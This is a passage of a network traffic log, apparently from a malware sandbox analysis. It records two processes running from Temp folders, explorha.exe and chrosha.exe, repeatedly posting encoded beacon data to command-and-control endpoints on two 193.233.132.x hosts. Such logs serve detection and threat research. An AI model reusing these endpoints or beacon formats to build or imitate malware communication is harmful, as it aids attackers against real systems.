Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:55.589148045 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
642 | 192.168.2.5 | 50488 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:55.581634045 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:55.826241016 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
643 | 192.168.2.5 | 50489 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:55.941291094 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:56.184322119 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      644192.168.2.550490193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:56.080595016 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:56.336293936 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
645 | 192.168.2.5 | 50491 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:56.437865973 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:56.691598892 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
646 | 192.168.2.5 | 50492 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:56.697947979 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:56.948544979 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
647 | 192.168.2.5 | 50493 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:57.051670074 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:57.295495987 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
648 | 192.168.2.5 | 50494 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:57.199286938 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:57.450211048 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
649 | 192.168.2.5 | 50495 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:57.545366049 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:57.794579029 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
650 | 192.168.2.5 | 50496 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:57.807547092 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:58.056586027 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
651 | 192.168.2.5 | 50497 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:58.149172068 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:58.394083023 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
652 | 192.168.2.5 | 50498 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:58.308418989 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:58.561166048 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
653 | 192.168.2.5 | 50499 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:58.645417929 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:58.896071911 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
654 | 192.168.2.5 | 50500 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:58.909220934 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:59.148525953 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
655 | 192.168.2.5 | 50501 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:59.255131960 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:59.499320030 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
656 | 192.168.2.5 | 50502 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:59.399334908 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:59.650782108 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
657 | 192.168.2.5 | 50503 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:59.748403072 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:59.998964071 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
658 | 192.168.2.5 | 50504 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:00.011800051 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:00.262751102 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
659 | 192.168.2.5 | 50505 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:00.350105047 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:00.594484091 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
660 | 192.168.2.5 | 50506 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:00.521608114 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:00.780194044 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
